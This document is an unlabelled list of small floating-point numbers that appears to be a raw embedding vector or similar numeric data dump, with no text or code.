0.02360503375530243, 0.0012356326915323734, 0.00984148308634758, 0.02425871044397354, 0.01628384180366993, 0.014555227011442184, -0.005839521996676922, 0.00014401340740732849, 0.018361084163188934, 0.003871225519105792, -0.03544386476278305, -0.009580012410879135, -0.006137308664619923, 0.003604307072237134, -0.0015052747912704945, -0.02067074552178383, 0.004524903371930122, 0.018143191933631897, -0.005933942273259163, 0.027672361582517624, 0.008940860629081726, 0.0048771630972623825, 0.0035316762514412403, 0.010821999981999397, -0.006271675694733858, -0.02934287302196026, -0.021513264626264572, -0.0026891580782830715, -0.015804477035999298, 0.0025366332847625017, 0.026641003787517548, 0.012383563444018364, -0.025813011452555656, -0.0032393368892371655, 0.010640422813594341, -0.04093476012349129, -0.02120821364223957, -0.002217057393863797, 0.016124052926898003, 0.02588564343750477, -0.024694496765732765, 0.02062716707587242, -0.012870190665125847, -0.006841828115284443, 0.0023913714103400707, 0.0024222396314144135, 0.02617616578936577, -0.033177781850099564, 0.029778657481074333, 0.01095273531973362, -0.0462803915143013, -0.04052802547812462, -0.0059666261076927185, 0.008831913582980633, -0.018782343715429306, -0.03503713384270668, 0.031783267855644226, 0.02742541767656803, 0.012528825551271439, 0.04046992212533951, 0.0035316762514412403, 0.011032629758119583, -0.0023659507278352976, 0.02812267281115055, -0.01440996490418911, -0.009863272309303284, 0.014976485632359982, 0.029575290158391, -0.03381693363189697, 0.03422366827726364, -0.038407206535339355, 0.009478328749537468, 0.001399052212946117, 0.0063261487521231174, -0.04145770147442818, 0.008396129123866558, -0.006649356335401535, -0.027149420231580734, 0.020714323967695236, 0.014664173126220703, -0.04715196043252945, -0.0380876287817955, 0.0000032839934647199698, 0.02524649165570736, 0.008592232130467892, -0.017794564366340637, -0.0010831078980118036, -0.0014290123945102096, -0.010226426646113396, -0.0345432423055172, -0.002832604106515646, -0.013226081617176533, -0.008207288570702076, -0.0028925244696438313, -0.009718010202050209, -0.004154485650360584, 0.013603762723505497, -0.028543932363390923, -0.0017449567094445229, -0.003368256613612175, 0.0064169373363256454, 0.034659452736377716, -0.013284186832606792, 0.01674867980182171, 0.046018920838832855, -0.0009641748038120568, -0.025754906237125397, 0.0018348373705521226, -0.026059957221150398, -0.0059666261076927185, -0.010299057699739933, -0.003918435424566269, 0.0037622791714966297, -0.021600421518087387, 0.01950865238904953, -0.007887712679803371, -0.016095001250505447, 0.011838831938803196, -0.022530095651745796, 0.02237030863761902, 0.0013908811379224062, -0.01968296617269516, -0.016530785709619522, -0.015107220970094204, 0.0023387139663100243, -0.03082454204559326, 0.007909501902759075, -0.003328309627249837, -0.028616564348340034, -0.0007290323846973479, -0.009238647297024727, -0.0010595028288662434, 0.006576725281774998, 0.012347248382866383, -0.011729885824024677, -0.01857897639274597, -0.014388175681233406, 0.02611806057393551, -0.007611715234816074, 0.014025021344423294, 0.027381839230656624, -0.029662448912858963, -0.03988887369632721, 0.005218528211116791, 0.004201695788651705, -0.000553356425371021, 0.00620993971824646, -0.006115519441664219, 0.008628547191619873, 0.005371052771806717, -0.010734843090176582, -0.012514298781752586, -0.0012710402952507138, 0.0005647050566039979, 0.000902438594494015, 0.04950520396232605, -0.013821654953062534, -0.006475042086094618, 0.026873422786593437, -0.010509687475860119, 0.01303724106401205, -0.018114140257239342, -0.028224356472492218, 0.006700197700411081, -0.027570679783821106, 0.007727924734354019, 0.021542316302657127, -0.007215877063572407, -0.03346830606460571, -0.010088427923619747, -0.01645815558731556, 0.008911808021366596, 0.020540010184049606, 0.0019574020989239216, 0.018491819500923157, 0.015470375306904316, 0.00832349807024002, -0.03134748339653015, -0.023067565634846687, 0.013247870840132236, 0.00835255067795515, -0.009928639978170395, 0.015601111575961113, 0.008563179522752762, 0.028398670256137848, 0.029255714267492294, 0.018709711730480194, -0.007103299256414175, -0.002062716754153371, -0.02296588197350502, -0.03724510967731476, 0.012441668659448624, -0.012085776776075363, -0.0066638826392591, -0.01397417951375246, -0.025173859670758247, -0.0041653807274997234, 0.026147114112973213, 0.02377934753894806, 0.01991538517177105, -0.03791331499814987, 0.0022025310900062323, -0.00022470175463240594, 0.025740381330251694, -0.0421840101480484, 0.024752601981163025, -0.006445989944040775, -0.0013355001574382186, -0.027962885797023773, 0.013690919615328312, -0.006115519441664219, -0.017794564366340637, -0.009042543359100819, 0.041922539472579956, -0.04096380993723869, 0.00984148308634758, -0.01001579686999321, 0.005821364466100931, -0.03099885582923889, -0.019697492942214012, -0.023387141525745392, 0.0193343386054039, 0.007648030761629343, 0.00019791912927757949, 0.033003468066453934, 0.019014762714505196, -0.01622573658823967, -0.030969804152846336, 0.00802571140229702, -0.04709385707974434, 0.022225046530365944, 0.0316380076110363, -0.004975214600563049, 0.03410745784640312, 0.0012928295182064176, -0.017198991030454636, 0.018898552283644676, 0.015673741698265076, -0.008853702805936337, 0.011562834493815899, -0.03532765433192253, -0.02132442407310009, -0.017562145367264748, 0.027323734015226364, -0.007459190674126148, -0.01259419322013855, -0.017896246165037155, -0.012695875950157642, 0.03402030095458031, -0.01558658480644226, -0.038116682320833206, -0.029488133266568184, -0.008570442907512188, -0.026045430451631546, 0.03314872831106186, -0.026379533112049103, 0.009383908472955227, -0.0006745592108927667, -0.014802171848714352, 0.007186824921518564, -0.026582898572087288, 0.010001271031796932, -0.018608029931783676, 0.011497466824948788, -0.015673741698265076, -0.02572585456073284, 0.011809779331088066, -0.010880104266107082, 0.004129065200686455, 0.006954405922442675, -0.040092241019010544, 0.02296588197350502, -0.020060647279024124, 0.021251793950796127, 0.02314019575715065, 0.009202331304550171, 0.039336878806352615, -0.02144063264131546, -0.01804150827229023, -0.005294790491461754, 0.023111144080758095, 0.009950429201126099, 0.02489786222577095, 0.003015996888279915, -0.02027853950858116, -0.018346557393670082, 0.0073284548707306385, -0.04933088645339012, -0.00870117824524641, -0.012201986275613308, -0.04189348593354225, -0.008998964913189411, -0.04169011861085892, -0.0013854338321834803, 0.00582862738519907, 0.011068944819271564, -0.003544386476278305, 0.017387831583619118, 0.01892760582268238, 0.00638425350189209, 0.026161640882492065, -0.011555572040379047, 0.0060610463842749596, -0.0057814172469079494, -0.010771158151328564, 0.019523179158568382, -0.014330071397125721, 0.03390409052371979, 0.009616327472031116, 0.004038276616483927, 0.006173624191433191, -0.0014580647693946958, 0.009681695140898228, 0.005883100442588329, -0.041864436119794846, 0.0019501389469951391, -0.028398670256137848, -0.01470775157213211, -0.008112868294119835, 0.004484956152737141, 0.02924118936061859, -0.004383272957056761, -0.0028471301775425673, 0.010989051312208176, 0.0014725909568369389, 0.003377335611730814, -0.009761589579284191, -0.007186824921518564, 0.012681350111961365, -0.004376010037958622, -0.0030123654287308455, 0.034833766520023346, -0.016124052926898003, 0.01165725477039814, -0.05569335073232651, -0.049766674637794495, 0.02395366132259369, 0.0034263613633811474, -0.013371343724429607, -0.0421840101480484, -0.00002367596243857406, 0.007575399708002806, 0.03277105093002319, -0.006544041447341442, -0.03733226656913757, 0.0010431609116494656, -0.007873186841607094, -0.010684001259505749, -0.01663246937096119, -0.0017948903841897845, 0.004764585290104151, -0.03532765433192253, 0.0036660432815551758, 0.02354692853987217, -0.005639787297695875, -0.01221651304513216, 0.023851977661252022, 0.011867884546518326, 0.001921086572110653, -0.024244185537099838, -0.025261016562581062, -0.02700415812432766, -0.0003415920655243099, -0.026858896017074585, 0.02777404524385929, -0.015223430469632149, 0.04171917214989662, 0.007390191312879324, 0.006202676333487034, -0.010320846922695637, 0.025086702778935432, 0.020234961062669754, -0.00676556583493948, -0.019494125619530678, -0.006300728302448988, 0.0030632070265710354, 0.010466109029948711, -0.003936593420803547, -0.025319121778011322, -0.011461151763796806, 0.02097579650580883, 0.022864198312163353, -0.007128720171749592, -0.00014446733985096216, -0.0008102881838567555, -0.007698872592300177, -0.021062953397631645, -0.0039002778939902782, 0.024592813104391098, 0.021004848182201385, 0.017591197043657303, -0.008236341178417206, 0.042387377470731735, 0.004612060263752937, -0.029037822037935257, -0.02530459500849247, -0.021876418963074684, -0.01669057458639145, -0.011584623716771603, -0.024854283779859543, -0.020220434293150902, -0.024985019117593765, 0.0468614399433136, -0.008446970023214817, -0.002832604106515646, -0.008345287293195724, 0.008948123082518578, -0.0006119150784797966, 0.026611952111124992, -0.01775098592042923, -0.022777041420340538, 0.01226735394448042, 0.0076044523157179356, -0.03721605986356735, 0.0067837233655154705, -0.026670055463910103, -0.029444554820656776, -0.0073320865631103516, -0.020234961062669754, 0.015049116685986519, 0.06252065300941467, 0.02244293875992298, 0.057552702724933624, -0.014054073952138424, -0.01634194701910019, 0.010596844367682934, -0.00729213934391737, 0.022777041420340538, -0.027076788246631622, 0.015368692576885223, -0.0068745119497179985, -0.02271893620491028, -0.005701523274183273, 0.011497466824948788, 0.021426107734441757, -0.010458845645189285, -0.014075863175094128, -0.006721987389028072, 0.012238302268087864, 0.02940097637474537, -0.04270695149898529, 0.012085776776075363, -0.019871806725859642, -0.0029361029155552387, -0.0398598238825798, -0.04230022057890892, -0.042794108390808105, -0.014823961071670055, -0.0380876287817955, -0.00007626241858815774, -0.02719299867749214, -0.011802516877651215, -0.006402411498129368, 0.008446970023214817, 0.015862582251429558, -0.02080148085951805, 0.038232892751693726, -0.023924609646201134, -0.005429157521575689, 0.013393132947385311, 0.00146441999822855, 0.015455849468708038, 0.005668839439749718, -0.02325640432536602, 0.020046120509505272, 0.004884426016360521, 0.03070833347737789, -0.004459535703063011, -0.00547636765986681, -0.002636500634253025, 0.032422419637441635, 0.013603762723505497, 0.029371924698352814, -0.002787209814414382, 0.0022007154766470194, 0.022399360314011574, 0.04712291061878204, 0.013342291116714478, -0.013167977333068848, 0.020525485277175903, 0.015194378793239594, -0.017242569476366043, -0.02864561602473259, 0.015005538240075111, -0.010589580982923508, -0.010124743916094303, -0.015833530575037003, 0.030040128156542778, 0.005992047023028135, -0.050696346908807755, -0.028020991012454033, -0.00635883305221796, 0.016370998695492744, 0.016893940046429634, 0.013698182068765163, -0.0018439162522554398, 0.014148494228720665, -0.003553465474396944, -0.01541227102279663, 0.05049298331141472, 0.015572058968245983, -0.016182158142328262, 0.0036369909066706896, 0.0016087738331407309, 0.005643418524414301, 0.014751330018043518, -0.007023405283689499, -0.01663246937096119, -0.022007154300808907, 0.010037586092948914, -0.02964792214334011, -0.014271966181695461, -0.03901730477809906, -0.002113558351993561, 0.014075863175094128, 0.00009487407805863768, 0.005610734689980745, 0.011068944819271564, 0.007096036337316036, -0.02161494828760624, -0.027628783136606216, 0.026219744235277176, -0.03378788009285927, 0.020714323967695236, -0.006195413414388895, -0.021179161965847015, -0.02717847190797329, -0.0014834855683147907, -0.009354855865240097, 0.0068781436420977116, 0.002505765063688159, -0.047064803540706635, 0.017663827165961266, 0.003101338166743517, -0.028732772916555405, 0.0219635758548975, -0.016370998695492744, -0.027628783136606216, -0.017968878149986267, -0.009151489473879337, -0.040324658155441284, -0.017780037596821785, 0.009943166747689247, 0.030185390263795853, 0.04991193488240242, 0.025261016562581062, -0.004561218898743391, -0.0016441813204437494, -0.008040237240493298, -0.00011723076750058681, -0.013785339891910553, 0.008592232130467892, 0.003379151225090027, 0.019944436848163605, 0.024113450199365616, 0.011417573317885399, 0.0011793437879532576, -0.02325640432536602, -0.00676556583493948, -0.014627857133746147, -0.010727579705417156, -0.0012792112538591027, -0.005995678249746561, 0.034833766520023346, -0.0007753345416858792, 0.00951464381068945, 0.02383745275437832, -0.012746717780828476, 0.017242569476366043, -0.0070560891181230545, -0.007037931587547064, -0.015484902076423168, -0.011192417703568935, -0.006293464917689562, -0.004630218259990215, -0.0018112324178218842, 0.0019973490852862597, -0.014874802902340889, 0.011323153041303158, -0.012201986275613308, 0.030940750613808632, -0.035472918301820755, 0.006278939079493284, -0.022994933649897575, 0.019712017849087715, 0.007735187653452158, -0.019726544618606567, -0.008664863184094429, -0.008802861906588078, -0.031667061150074005, 0.031434640288352966, 0.008011185564100742, -0.007037931587547064, -0.002789025427773595, -0.020467380061745644, -0.014918381348252296, 0.009652642533183098, 0.03320683538913727, -0.0007376573048532009, 0.0409928634762764, 0.02115011028945446, 0.02267535775899887, 0.0006836380925960839, -0.019523179158568382, -0.0193343386054039, 0.004822690039873123, 0.012122092768549919, -0.004895320627838373, 0.015426796860992908, -0.026277849450707436, -0.009957692585885525, 0.01682130992412567, -0.00852686446160078, 0.021716630086302757, -0.0021190056577324867, 0.008279919624328613, 0.005527209490537643, -0.010291794314980507, 0.023997239768505096, 0.03361356630921364, -0.020046120509505272, 0.017387831583619118, -0.03407840430736542, -0.02144063264131546, 0.018085086718201637, 0.031899478286504745, -0.0219635758548975, 0.01095273531973362, -0.006104624830186367, 0.03210284560918808, -0.012441668659448624, 0.005665208213031292, -0.019479600712656975, -0.004038276616483927, -0.0015715504996478558, 0.002511212369427085, 0.030534017831087112, 0.021890943869948387, 0.013727234676480293, 0.014961959794163704, -0.002385924104601145, -0.02408439666032791, 0.00386033090762794, 0.0038530677556991577, 0.017068255692720413, 0.0068018813617527485, 0.030969804152846336, 0.003504439489915967, -0.009216858074069023, 0.008548653684556484, 0.02190547063946724, 0.015223430469632149, -0.0058576799929142, -0.0013164345873519778, -0.02437492087483406, -0.020714323967695236, 0.008940860629081726, -0.035472918301820755, -0.0071650356985628605, -0.0014108546311035752, -0.002035480225458741, -0.01324060745537281, 0.002974234288558364, -0.03907540813088417, -0.023096617311239243, -0.009979481808841228, 0.019523179158568382, -0.007880449295043945, -0.002046374836936593, 0.013008189387619495, -0.010865578427910805, -0.02261725254356861, 0.035705335438251495, 0.030853593721985817, 0.005548998713493347, 0.01004484947770834, 0.003646069671958685, -0.012100303545594215, 0.02555154077708721, -0.022530095651745796, 0.04134149104356766, -0.010117480531334877, 0.013291449286043644, -0.007880449295043945, -0.01541227102279663, 0.02918308414518833, 0.02630690112709999, 0.03843625634908676, -0.010328110307455063, -0.02132442407310009, 0.006950774230062962, 0.011286837048828602, 0.012456194497644901, -0.0069653005339205265, 0.00471737515181303, -0.0026147114112973213, 0.015601111575961113, 0.031144117936491966, -0.0022116100881248713, 0.004779111593961716, 0.00796760618686676, -0.02197810262441635, -0.020481904968619347, 0.016719626262784004, -0.0024676339235156775, 0.007778766565024853, 0.011214206926524639, -0.008948123082518578, -0.0006514081032946706, 0.036809325218200684, 0.013487553223967552, -0.06536778807640076, -0.02244293875992298, -0.01927623338997364, -0.009834219701588154, -0.001643273513764143, 0.01057505514472723, -0.023532401770353317, 0.0131752397865057, 0.0257839597761631, -0.029618868604302406, -0.008752020075917244, 0.0023496088106185198, -0.0002396818745182827, -0.019290760159492493, 0.021861892193555832, -0.007379296701401472, 0.003816752228885889, 0.025522489100694656, -0.02238483540713787, 0.014838486909866333, -0.004248905926942825, -0.020961269736289978, 0.014286492019891739, 0.008955386467278004, 0.023997239768505096, -0.021571367979049683, -0.022820619866251945, -0.012993662618100643, -0.01657436415553093, 0.004760953597724438, -0.013930601067841053, -0.0016759573481976986, 0.003248415654525161, 0.002749078441411257, 0.002222504699602723, -0.0055998400785028934, -0.002489423146471381, 0.001441722852177918, -0.029894866049289703, 0.0049679516814649105, 0.005665208213031292, -0.011265047825872898, -0.012637771666049957, -0.014976485632359982, 0.004477693233639002, 0.0322190560400486, -0.012550614774227142, -0.005705154966562986, 0.015107220970094204, 0.032712943851947784, 0.002182557713240385, 0.0024912389926612377, 0.012151144444942474, -0.024040818214416504, 0.023416193202137947, -0.0066638826392591, -0.0045866393484175205, -0.00017147694597952068, 0.013632814399898052, 0.016661522909998894, -0.02072885073721409, -0.006271675694733858, 0.010320846922695637, -0.007517295423895121, 0.016530785709619522, 0.036460697650909424, -0.010582317598164082, -0.010792947374284267, -0.006173624191433191, 0.0025366332847625017, -0.0004721006553154439, -0.016080474480986595, -0.02120821364223957, 0.007931291125714779, -0.02929929457604885, -0.01599331758916378, 0.003765910631045699, -0.014104914851486683, -0.0002594284014776349, 0.007807818707078695, 0.02823888324201107, 0.0009968586964532733, 0.02418608032166958, -0.0007698872359469533, 0.01927623338997364, -0.020598115399479866, 0.008425180800259113, 0.007295771036297083, 0.022660832852125168, 0.0024331342428922653, 0.001637826208025217, 0.014685962349176407, 0.009710747748613358, 0.017068255692720413, 0.00036905560409650207, 0.004368747118860483, 0.0027309206780046225, -0.030911698937416077, 0.02600185200572014, -0.008301708847284317, -0.010959998704493046, 0.014250176958739758, -0.0008888202719390392, 0.01127957459539175, -0.010800210759043694, 0.007037931587547064, 0.010008534416556358, -0.006246254779398441, 0.008003922179341316, -0.008221814408898354, -0.018433716148138046, -0.02314019575715065, 0.0014344597002491355, -0.0136255519464612, 0.026495741680264473, 0.017881721258163452, -0.035240497440099716, 0.006583988666534424, 0.006028362549841404, -0.026582898572087288, -0.007230403367429972, -0.021687578409910202, 0.009391171857714653, 0.013059030286967754, 0.013574710115790367, -0.004844479262828827, -0.00951464381068945, 0.03346830606460571, -0.011555572040379047, -0.016617942601442337, 0.04288126528263092, -0.011838831938803196, 0.005803206469863653, 0.01221651304513216, -0.005817732773721218, 0.026800790801644325, 0.004891689401119947, -0.016196684911847115, -0.006188150495290756, -0.0011611860245466232, -0.0037187007255852222, -0.004757321905344725, 0.013959653675556183, 0.0210920050740242, -0.004779111593961716, -0.018114140257239342, -0.03329399228096008, 0.014337333850562572, 0.01198409404605627, -0.0005624353070743382, 0.0037840683944523335, -0.008534127846360207, -0.0117153599858284, 0.023445244878530502, -0.0027999200392514467, -0.023154722526669502, -0.030475914478302002, 0.012761244550347328, -0.0006877235719002783, -0.0049679516814649105, 0.005501788575202227, -0.008948123082518578, -0.02789025567471981, 0.011490204371511936, 0.03538576140999794, 0.029430029913783073, 0.00024285947438329458, 0.00431790528818965, -0.0014571568462997675, -0.009093385189771652, -0.0027054999954998493, -0.0013636446092277765, -0.010175584815442562, -0.03169611096382141, 0.028965191915631294, -0.003373703919351101, 0.007648030761629343, 0.026466690003871918, -0.0041472227312624454, 0.03614112362265587, -0.001685944152995944, 0.009412961080670357, -0.030098233371973038, -0.0020826903637498617, -0.024462077766656876, -0.024520182982087135, 0.009442013688385487, 0.01309534627944231, -0.0028217092622071505, 0.030969804152846336, -0.017896246165037155, 0.010865578427910805, -0.03361356630921364, -0.028674667701125145, -0.014715014956891537, 0.031667061150074005, -0.0196248609572649, 0.004470430314540863, 0.017257094383239746, -0.025754906237125397, -0.000015192903447314166, 0.011148839257657528, -0.0164000503718853, -0.011758938431739807, 0.006456884555518627, 0.009659905917942524, 0.01974107138812542, -0.001708641299046576, 0.011054418981075287, 0.02595827355980873, -0.005621629301458597, -0.0187387652695179, 0.045902710407972336, 0.013727234676480293, -0.002863472094759345, 0.008882755413651466, 0.027498047798871994, -0.02881992980837822, -0.007553610485047102, -0.005734207108616829, 0.0026437637861818075, -0.033177781850099564, -0.010792947374284267, 0.01135946810245514, 0.010742105543613434, 0.006246254779398441, 0.026931528002023697, -0.016908466815948486, 0.017852667719125748, 0.005131371319293976, 0.0043142735958099365, -0.02688794955611229, 0.0014335517771542072, 0.022820619866251945, 0.040324658155441284, -0.019348863512277603, 0.01074936892837286, 0.011729885824024677, -0.004212590400129557, -0.00785139761865139, -0.01881139539182186, 0.030040128156542778, 0.001977375475689769, 0.019944436848163605, -0.017591197043657303, 0.01191872637718916, -0.012993662618100643, -0.01107620820403099, -0.009877798147499561, -0.000854320649523288, -0.007350244093686342, -0.005429157521575689, 0.012470720335841179, -0.016254788264632225, 0.03442703187465668, -0.02559511922299862, -0.008192762732505798, 0.008236341178417206, -0.026495741680264473, 0.01092368271201849, -0.021077478304505348, 0.006010204553604126, 0.012238302268087864, 0.008846440352499485, 0.009209594689309597, 0.03425271809101105, 0.015499427914619446, 0.017140885815024376, -0.0038458046037703753, 0.007974869571626186, 0.004989740904420614, -0.018782343715429306, 0.019348863512277603, 0.006809144280850887, -0.009122437797486782, -0.012318195775151253, -0.013262397609651089, -0.008374339900910854, -0.015862582251429558, 0.005999309942126274, -0.010654948651790619, 0.006936248391866684, -0.0053311060182750225, 0.01863708160817623, 0.007204982452094555, -0.0043287998996675014, 0.004800900816917419, -0.0011221469612792134, -0.0006586711970157921, 0.006362464278936386, 0.009304014965891838, -0.004049171227961779, 0.0024567393120378256, 0.011192417703568935, -0.008679389022290707, 0.014700488187372684, -0.008541390299797058, -0.019130971282720566, 0.02126631885766983, -0.0019192708423361182, 0.001875692280009389, -0.01473680417984724, -0.0251883864402771, 0.02945908159017563, -0.013291449286043644, 0.026728160679340363, -0.0016523522790521383, -0.005933942273259163, 0.0027454469818621874, -0.03128938004374504, -0.014039547182619572, 0.004848110489547253, 0.008454233407974243, -0.008301708847284317, -0.0008293537539429963, 0.003226626431569457, -0.014075863175094128, -0.0069653005339205265, 0.01850634627044201, 0.0038494362961500883, 0.020990321412682533, 0.015049116685986519, 0.018593503162264824, -0.005552629940211773, -0.0009505565394647419, 0.0105460025370121, 0.01722804270684719, 0.008773809298872948, 0.01499101147055626, 0.001592431915923953, -0.005654313135892153, 0.039220672100782394, -0.024970494210720062, 0.002077242825180292, -0.024636391550302505, 0.015557533130049706, -0.006006572861224413, 0.027933834120631218, -0.007466453593224287, -0.016908466815948486, 0.004735532682389021, 0.0187387652695179, -0.006206308025866747, 0.004183538258075714, 0.00981243047863245, 0.0033537305425852537, 0.024215131998062134, -0.019290760159492493, -0.007357507478445768, 0.008969912305474281, 0.007175930310040712, -0.01634194701910019, 0.0038494362961500883, 0.00620993971824646, -0.009267698973417282, -0.0041653807274997234, -0.004800900816917419, -0.0066057778894901276, -0.011177890934050083, -0.009238647297024727, 0.012412616051733494, 0.007154141087085009, -0.011497466824948788, 0.015194378793239594, -0.023096617311239243, -0.00014435386401601136, -0.007662557065486908, 0.003533491864800453, -0.01367639284580946, 0.0035734388511627913, -0.008062026463449001, -0.012303669936954975, -0.03381693363189697, 0.012964610941708088, -0.01107620820403099, -0.0023151091299951077, 0.014838486909866333, -0.003820383921265602, -0.021426107734441757, -0.012376300990581512, -0.028500353917479515, -0.010887367650866508, 0.005080529488623142, 0.00749550573527813, 0.0021571367979049683, -0.023634085431694984, -0.019886333495378494, -0.0012165671214461327, 0.012485247105360031, 0.007186824921518564, -0.02331450954079628, -0.0007017957977950573, 0.017721932381391525, 0.015557533130049706, 0.0023332666605710983, 0.005160423461347818, 0.014431754127144814, 0.015368692576885223, 0.003780436934903264, -0.0005043306155130267, 0.011461151763796806, 0.010364425368607044, -0.004521271679550409, -0.020467380061745644, 0.020481904968619347, -0.0012183828512206674, 0.003925698809325695, -0.024098923429846764, 0.009819693863391876, 0.0010004902724176645, -0.007633504457771778, 0.024403972551226616, -0.013073557056486607, 0.0064169373363256454, 0.005552629940211773, -0.01387975923717022, -0.014417228288948536, -0.02314019575715065, -0.007444664370268583, 0.011562834493815899, -0.02980770915746689, -0.029749605804681778, -0.0071505093947052956, 0.007451927289366722, 0.02008969895541668, -0.008984439074993134, -0.015223430469632149, -0.0202059093862772, -0.0035825178492814302, -0.023532401770353317, 0.0005992046790197492, 0.006075572222471237, 0.023125668987631798, -0.005160423461347818, 0.009696220979094505, -0.020583588629961014, -0.0004761861637234688, -0.016414577141404152, 0.01282661221921444, 0.03913351520895958, 0.013814391568303108, -0.02366313710808754, -0.014061336405575275, -0.0013926969841122627, -0.009129700250923634, -0.002122637117281556, 0.013887022621929646, -0.010771158151328564, 0.015688268467783928, 0.012681350111961365, 0.0026800790801644325, -0.007135983090847731, -0.027134893462061882, 0.013640077784657478, 0.023401666432619095, 0.007459190674126148, -0.012492509558796883, 0.010204637423157692, -0.010945471934974194, 0.010197374038398266, 0.0009777931263670325, 0.014497121796011925, 0.0013609209563583136, 0.012514298781752586, 0.021019374951720238, -0.002153505338355899, 0.012463457882404327, -0.003896646201610565, 0.004938899073749781, 0.0013454868458211422, 0.005770522635430098, -0.0042234850116074085, 0.0008647612994536757, -0.017780037596821785, -0.009776115417480469, 0.021774735301733017, 0.014141230843961239, -0.011533782817423344, 0.013414922170341015, -0.0051458971574902534, 0.004005592782050371, 0.027788572013378143, 0.013843444176018238, 0.003649701364338398, 0.017373304814100266, 0.014555227011442184, 0.008570442907512188, 0.007909501902759075, -0.029023297131061554, -0.015121747739613056, -0.01098178792744875, 0.00785139761865139, 0.023634085431694984, 0.007005247753113508, 0.012136618606746197, -0.0008965373272076249, 0.009572749026119709, 0.004797269124537706, -0.008868229575455189, -0.000945109233725816, 0.0066021461971104145, -0.0064169373363256454, 0.01856445148587227, -0.001990085933357477, 0.025871116667985916, -0.0061482032760977745, -0.009914114139974117, 0.003669674741104245, -0.010676737874746323, -0.012194723822176456, -0.013872496783733368, 0.0019483231008052826, 0.012071250937879086, 0.0031285746954381466, -0.0006278030923567712, -0.009645380079746246, -0.02653932012617588, 0.0029288399964571, -0.00846875924617052, -0.001728614792227745, -0.013640077784657478, 0.005748733412474394, 0.002273346297442913, -0.005214896518737078, -0.008577706292271614, 0.005087792407721281, 0.0010740290163084865, -0.006714724004268646, -0.0345722958445549, 0.0022206888534128666, 0.013632814399898052, -0.017126359045505524, -0.004862636793404818, 0.0011838831705972552, 0.004158117342740297, -0.0011166996555402875, 0.0032229949720203876, -0.013574710115790367, 0.01792529970407486, -0.013182503171265125, -0.0066057778894901276, -0.02379387430846691, -0.01593521237373352, 0.03532765433192253, 0.0007036115857772529, 0.010400740429759026, -0.009325804188847542, 0.001549761276692152, 0.02033664472401142, 0.005233054514974356, -0.04180632904171944, 0.013887022621929646, -0.012071250937879086, -0.019944436848163605, 0.02331450954079628, -0.004492219537496567, -0.026902474462985992, 0.0002396818745182827, 0.0068926699459552765, -0.014344597235321999, -0.00310496985912323, -0.016777731478214264, 0.003776805242523551, 0.02829698845744133, 0.001990085933357477, 0.011177890934050083, -0.00996495597064495, -0.000024512919480912387, 0.0036224648356437683, 0.007480979897081852, -0.010415267199277878, -0.01289197988808155, -0.0008561363792978227, 0.039104461669921875, 0.016617942601442337, 0.0016287473263218999, 0.004989740904420614, -0.008810124360024929, 0.015121747739613056, -0.004913478624075651, 0.028398670256137848, -0.0133277652785182, 0.021455159410834312, -0.010829263366758823, -0.0066021461971104145, -0.0052439491264522076, 0.012790296226739883, -0.004484956152737141, 0.005541735328733921, -0.009856008924543858, -0.017445934936404228, 0.00006485710036940873, -0.000029619777706102468, -0.00008284458453999832, 0.007157772313803434, 0.013545657508075237, 0.020191382616758347, 0.01605142280459404, 0.012027672491967678, -0.004808163736015558, -0.0044050621800124645, -0.0009950429666787386, -0.015165326185524464, -0.014903854578733444, 0.004103644285351038, 0.019639387726783752, 0.004826321266591549, 0.006834565196186304, 0.008062026463449001, 0.00025103046209551394, -0.02080148085951805, -0.018186770379543304, 0.0024276869371533394, 0.021702105179429054, 0.01593521237373352, -0.004583008121699095, 0.015150799416005611, 0.024229658767580986, 0.013044504448771477, 0.01711183413863182, -0.002832604106515646, 0.017373304814100266, -0.008287182077765465, -0.003497176570817828, -0.008425180800259113, 0.0025747644249349833, -0.00038721333839930594, -0.0011620939476415515, -0.004593902733176947, 0.0021807418670505285, 0.004020118620246649, -0.0068745119497179985, -0.009296751581132412, 0.005222159903496504, -0.011693570762872696, 0.0045103770680725574, 0.010378951206803322, 0.0051458971574902534, 0.0369255356490612, -0.0032084686681628227, 0.02560964599251747, 0.011410309933125973, 0.007335718255490065, -0.013690919615328312, 0.0023368983529508114, -0.019014762714505196, 0.0161095280200243, 0.017329726368188858, 0.0061482032760977745, -0.020641693845391273, 0.011824306100606918, 0.031841374933719635, -0.007288508117198944, -0.004706480540335178, 0.00211718981154263, 0.00019088301633019, -0.010030323639512062, 0.0038530677556991577, 0.0027054999954998493, 0.02144063264131546, -0.0018430083291605115, -0.0003572530986275524, -0.0070524574257433414, -0.02244293875992298, 0.019465073943138123, 0.004481324926018715, -0.009427486918866634, -0.0059702578000724316, 0.011068944819271564, -0.014489859342575073, -0.030185390263795853, -0.004179906565696001, 0.01628384180366993, -0.010030323639512062, 0.0016814046539366245, 0.013916075229644775, -0.005432789213955402, 0.00663483003154397, -0.020888639613986015, -0.0017685617785900831, -0.006122782360762358, -0.009362119249999523, -0.020874112844467163, -0.0001451482530683279, 0.0015888003399595618, 0.003342835931107402, 0.014729540795087814, 0.0024113450199365616, 0.0068708802573382854, 0.006228097248822451, -0.0019465073710307479, 0.004070960450917482, 0.011134312488138676, 0.027280155569314957, 0.01728614792227745, 0.024462077766656876, -0.030301598832011223, -0.007611715234816074, 0.01885497383773327, -0.005204001907259226, -0.005338368937373161, -0.011206943541765213, -0.032538630068302155, 0.017736459150910378, -0.016893940046429634, 0.007223139982670546, 0.012964610941708088, 0.003015996888279915, -0.002727289218455553, -0.007037931587547064, -0.030272547155618668, -0.02940097637474537, -0.014228387735784054, 0.013545657508075237, -0.004169011954218149, -0.00739382253959775, -0.019871806725859642, -0.00595936318859458, -0.01927623338997364, 0.00323025812394917, -0.00041762751061469316, -0.0005828627618029714, -0.023227352648973465, -0.0105460025370121, -0.003998329397290945, -0.00981243047863245, 0.02454923465847969, 0.02576943300664425, 0.018419189378619194, -0.00328109972178936, -0.0008348010596819222, 0.0028162619564682245, 0.020234961062669754, -0.0004893505247309804, -0.023648612201213837, -0.0089335972443223, 0.01682130992412567, 0.011671781539916992, 0.0017422330565750599, 0.004092749673873186, -0.006565830670297146, -0.0024077133275568485, 0.022108837962150574, 0.009412961080670357, 0.0006005665054544806, 0.010349899530410767, -0.0028108146507292986, 0.01663246937096119, -0.012986400164663792, -0.021643999963998795, -0.011475677601993084, -0.00708877295255661, -0.0013364080805331469, 0.004866268485784531, 0.009006228297948837, 0.014112178236246109, 0.004143591038882732, 0.009732536971569061, 0.0007099667564034462, 0.025798486545681953, -0.0006119150784797966, -0.003593412460759282, -0.023241879418492317, -0.0023423456586897373, 0.01775098592042923, 